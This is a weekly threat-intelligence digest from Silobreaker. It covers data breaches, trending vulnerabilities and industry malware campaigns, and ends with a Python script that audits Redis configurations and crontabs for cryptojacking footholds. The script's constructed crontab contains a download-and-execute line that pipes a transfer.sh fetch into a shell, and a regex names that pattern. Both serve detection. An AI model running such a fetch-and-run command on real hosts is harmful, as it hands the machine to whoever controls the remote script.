09 March 2023
Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker.
Trending Vulnerable Products
Deep & Dark Web
Name | Heat 7 |
---|---|
Microsoft Word | (heat bar image) |
OpenSSH | (heat bar image) |
Bitcoin Core | (heat bar image) |
Microsoft Windows Defender | (heat bar image) |
Google Android | (heat bar image) |
Open Source
Name | Heat 7 |
---|---|
XWiki Platform | (heat bar image) |
Moodle | (heat bar image) |
Trusted Platform Module | (heat bar image) |
Snapchat App | (heat bar image) |
Xen Software | (heat bar image) |
The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.
Data Leaks & Breaches
Company | Information | Affected |
---|---|---|
GunAuction (US) | Hackers breached the company’s website, exposing sensitive personal data including names, home addresses, email addresses, plaintext passwords, and telephone numbers. The data allegedly makes it possible to link a particular individual with the sale or purchase of a specific weapon. | 550,000 |
Hatch Bank (US) | Hackers exploited a vulnerability in the company’s Fortra GoAnywhere MFT secure file-sharing platform on January 29th, 2023. Compromised information includes names and Social Security numbers. | 139,493 |
Chick-fil-A (US) | Customer accounts were compromised in a credential stuffing attack. This allowed the hackers to use stored rewards balances and access personal information, including names, email addresses, masked payment card numbers, and more. | Unknown |
College of the Desert (US) | A July 2022 malware attack may have led to unspecified personal data being subject to unauthorised access. | ~800 |
Modesto Police Department (US) | A ransomware attack on February 3rd, 2023, may have compromised the personal information of some individuals, including Social Security and driver’s license numbers. | Unknown |
Vesuvius (UK) | The Vice Society ransomware group claimed responsibility for an attack and published allegedly stolen files on their leak site. | Unknown |
Zurcal Group (Spain) | Stormous ransomware claimed to have targeted the company, naming it in its Telegram channel on February 24th, 2023. The attackers initially leaked images showing invoices and plans, before leaking further files as proof, including tax identification numbers. | Unknown |
Associação de Advogados de São Paulo (Brazil) | After the organisation denied any data exfiltration in a January 2023 breach, Ragnar Locker ransomware leaked 200GB of allegedly stolen files, some which contain personal information. | Unknown |
Multiple (South Africa) | The Public Service Co-ordinating Bargaining Council, the General Public Service Sector Bargaining Council, and the Safety and Security Sector Bargaining Council experienced a ransomware attack between February 24th and February 28th, 2023. | Unknown |
City of Oakland (US) | Play ransomware added the city to their leak site on March 1st, 2023, and began leaking the allegedly stolen data on March 4th, 2023. Potentially compromised data includes identity documents, personal data, information that allegedly proves human rights violations, and more. | Unknown |
Denver Public Schools (US) | An unauthorised actor stole data from the school district’s network between December 2022 and January 2023. Potentially compromised data includes names and Social Security numbers, fingerprints, bank account or pay card numbers, student identification numbers, driver’s license numbers, passport numbers, and more. | Unknown |
Tennessee State University (US) | On March 1st, 2023, the university notified students that it had been affected by a ransomware attack. Whilst the incident led to the university shutting down all internet access on campus, students were still able to access their email accounts and campus computer labs. | Unknown |
Medavie Blue Cross (Canada) | Customer data was impacted in a cyberattack in November 2022, in which attackers gained access to servers belonging to their subsidiary, Managed Health Care Services Inc. | Unknown |
Preferred Home Care of New York (US) | The care provider reached a settlement relating to a 2021 breach involving the personal data of patients and employees, which included sensitive health information and identifiers such as Social Security numbers. The REvil ransomware group previously claimed it was linked to the attack on the company. | 92,283 |
The Chautauqua Center (US) | An error during a system upgrade exposed protected health information and made it accessible to other entities. Compromised data includes names, primary diagnosis and related cause information, secondary insurance information, and more. The data has since been secured. | 747 |
Verizon (US) | A publicly available data dump, containing information allegedly stolen in January 2023, was advertised on the clear web. Potentially compromised information includes first names, customer hashes, usage statistics, contract status, device types, and more. | ~9,000,000 |
Hamburg University of Applied Sciences (Germany) | The Vice Society ransomware group added the university to their leak site. The university stated ‘significant amounts of data’ were copied, including usernames, ‘cryptographically secure’ passwords, email addresses, and mobile phone numbers. | Unknown |
City of Waynesboro (US) | The BianLian ransomware group claims to have infiltrated the local government network, acquiring around 350GB of data. Potentially compromised data includes files relating to the police department, which is said to include reports, criminal investigations, the personal data of staff, and more. | Unknown |
HDFC Bank (India) | A hacker posted 7.5GB of allegedly stolen data on an underground forum. The data is said to include full names, dates of birth, phone numbers, email addresses, physical addresses, financial information, and more. | Unknown |
Hospital Clinic de Barcelona (Spain) | A ransomware attack on March 5th, 2023, took computer systems offline, with all written work being completed on paper and operations and appointments cancelled. The Ransom House group is said to be behind the attack, but no demands have been made. | Unknown |
Northeast Surgical Group (US) | BianLian ransomware added the company to its leak site in January 2023, with data leaked in February 2023. Potentially compromised data includes names, addresses, Social Security numbers, dates of birth, and medical and treatment information. | 15,298 |
Attent Zorg en Behandeling (Netherlands) | The Qilin ransomware group claimed to have breached the organisation via an unpatched vulnerability, stealing hundreds of gigabytes of data, with some published on their leak site. Compromised information includes confidential internal communication, salary statements, non-disclosure agreements and passport copies. | Unknown |
Toyota (Japan) | An authentication bypass vulnerability allowed access to the personal information of customers in Mexico. Potentially compromised data includes names, addresses, phone numbers, email addresses, tax IDs, and vehicle ownership history. The vulnerability has since been fixed. | Unknown |
Council of Granada | GhostSec alleged they had gained access to a 7GB database via an SQLi attack, which they subsequently sold. A data sample provided by the hackers included personal and work-related information of some individuals, as well as usernames and passwords. | Unknown |
Minneapolis Public Schools (US) | Medusa ransomware added the school district to its leak site, threatening to leak stolen data if a $1 million ransom is not paid. The attackers have since posted a video showing them accessing personal staff and student data, including employee tax forms, HSA withdrawals, vendor contracts, and job applicant resumes. | Unknown |
HDB Financial Services (India) | A hacker posted 7.5GB of customer data on the Breached forum consisting of loan information from May 2022 to February 2023. Potentially compromised data includes names, dates of birth, phone numbers, email addresses, and more. | Unknown |
Black & McDonald (Canada) | The engineering company was targeted in a ransomware attack in February 2023. Ontario Power Generation stated there is no evidence that the incident compromised sensitive information. Black & McDonald have not publicly confirmed the attack. | Unknown |
Voskhod Research (Russia) | A threat actor may have infiltrated a database used to process personal data and biometrics, and issue electronic passports. The hacker may have accessed ‘tens of percent’ of the passport database. The allegedly stolen information also impacts some citizens from Kazakhstan and Belarus. | Unknown |
DC Health Link (US) | Sensitive personal data of persons connected to the US Senate and House of Representatives was listed for sale on a hacking forum following a breach at the company. The database reportedly includes names, dates of birth, addresses, email addresses, phone numbers, Social Security Numbers, and more. | 170,000 |
Attack Type mentions in Healthcare

This chart shows the trending attack types related to Healthcare within a curated list of cyber sources over the past week.
Weekly Industry View
Industry | Information |
---|---|
Government | ESET researchers analysed a new custom backdoor, named MQsTTang, attributed to Mustang Panda. The backdoor is part of an ongoing campaign that dates back to early January 2023. Victims of the campaign include unknown entities in Bulgaria and Australia and a governmental institution in Taiwan, and possibly political and governmental organisations in Europe and Asia. The malware is distributed via RAR archives, likely via spear phishing. The attacker is able to execute arbitrary commands on the victim machine, with persistence achieved by creating a registry Run key. |
Banking & Finance | Metabase Q researchers analysed a new strain of malware, dubbed FiXS, targeting the ATMs of banks in Mexico in order to steal funds. Whilst the initial infection vector is unknown, FiXS is believed to use a similar attack methodology to the Ploutus malware, whereby the attacker connects an external keyboard to the ATM. FiXS can be used to target any ATM which supports CEN XFS APIs. Whilst the origin of FiXS is unknown, it contains metadata which suggests it originates from Russia. |
Technology | Researchers at Mandiant and SonicWall identified suspected Chinese threat actor UNC4540 targeting SonicWall SMA100 devices with credential stealing malware. The malware was likely deployed in 2021, with the attacker believed to have persistent access through multiple firmware updates. The initial access vector is currently unknown. A bash script is used to execute a SQL command to steal credentials and execute further components, including the TinyShell backdoor. Persistence is achieved by constantly checking for a new firmware update and backdooring the ZIP file, as well as modifying appliance binaries. |
Retail & Hospitality | Trend Micro researchers discovered a spear phishing campaign targeting the hospitality industry with RedLine Stealer. The phishing emails lure victims into clicking a Dropbox link, with Bitly-shortened URLs that redirect to the Dropbox links also used. A downloaded ZIP file triggers a four-stage execution chain consisting of padded cabinet files, PowerShell scripts, and MSIL, PE, and image files. RedLine Stealer is ultimately injected into an executable, where it collects system information, as well as data from browsers, cryptocurrency wallets, VPN applications, and other installed applications such as Discord. |
Cryptocurrency | Cado Labs researchers discovered a novel cryptojacking campaign targeting unsecured deployments of Redis with XMRig. The campaign leverages the free and open-source command line file transfer service transfer[.]sh. Unsecured deployments of Redis are exploited for initial access, with a cron job exploit then used to achieve arbitrary code execution. The script conducts preparatory actions to ensure the hardware can be effectively utilised before retrieving the binaries for pnscan and XMRig, writing a custom XMRig configuration to disk. Tactics and techniques used in this campaign have previously been associated with cloud-focused groups WatchDog and TeamTNT. |
News and information concerning each mentioned industry over the last week.
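The Redis cryptojacking entry in the Cryptocurrency row rests on two conditions a defender controls: a Redis instance reachable from the network without authentication, and a cron entry that fetches a remote script and pipes it into a shell. The Python script below is an added example written for this digest, not code from Silobreaker, Cado Labs or the Redis project. It audits a redis.conf for the weak settings (an exposed configuration is shown beside a hardened one) and flags crontab lines that download-and-execute. The configuration fragments and crontab lines are constructed samples; the transfer.sh URL path and the requirepass value are placeholders.

```python
import re

# Constructed sample: the kind of exposed configuration the campaign abuses.
WEAK_REDIS_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass not set
"""

# Constructed sample: the same instance hardened (Redis 7 default bind syntax).
HARDENED_REDIS_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass PLACEHOLDER-long-random-password
rename-command CONFIG ""
rename-command DEBUG ""
"""

# Constructed crontab: one benign entry and one download-and-execute entry
# of the shape described in the Cado Labs write-up (URL path is a placeholder).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/1 * * * * curl -s https://transfer.sh/get/PLACEHOLDER/x.sh | sh
"""

# curl/wget (or a base64 decode) piped straight into a shell.
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"
    r"|\bbase64\s+(-d|--decode)\b.*\|\s*(sh|bash)\b"
)


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of argument lists seen for it.
    Comments and blank lines are dropped; repeated directives are all kept so
    every rename-command line survives."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checked
    weaknesses is present."""
    conf = parse_redis_conf(text)
    findings = []

    # No bind directive means Redis listens on every interface.
    binds = conf.get("bind", [[]])[-1]
    if not binds or any(b in ("0.0.0.0", "*", "::", "-::*") for b in binds):
        findings.append("bind: listens on all interfaces; restrict to loopback or an internal address")

    protected = conf.get("protected-mode", [["yes"]])[-1]
    if protected and protected[0].lower() == "no":
        findings.append("protected-mode no: remote clients are accepted without authentication")

    if "requirepass" not in conf:
        findings.append("requirepass unset: no password required to issue commands")

    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed/disabled: clients can alter runtime settings such as dir and dbfilename")

    return findings


def suspicious_cron_entries(text):
    """Return crontab lines that pipe a download into a shell or reference transfer.sh."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if DOWNLOAD_EXEC.search(line) or "transfer.sh" in line:
            hits.append(line)
    return hits


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_REDIS_CONF), ("hardened", HARDENED_REDIS_CONF)):
        print(f"[{label}] findings: {audit_redis_conf(conf) or 'none'}")
    print("[cron] suspicious:", suspicious_cron_entries(SAMPLE_CRONTAB))
```

Run against the real files (`/etc/redis/redis.conf`, `crontab -l`, the files under `/etc/cron.d`) the two functions give a quick first pass; the cron check is a heuristic and should be read alongside the instance's actual network exposure, since the unauthenticated-listener finding is what gives the cron abuse its foothold.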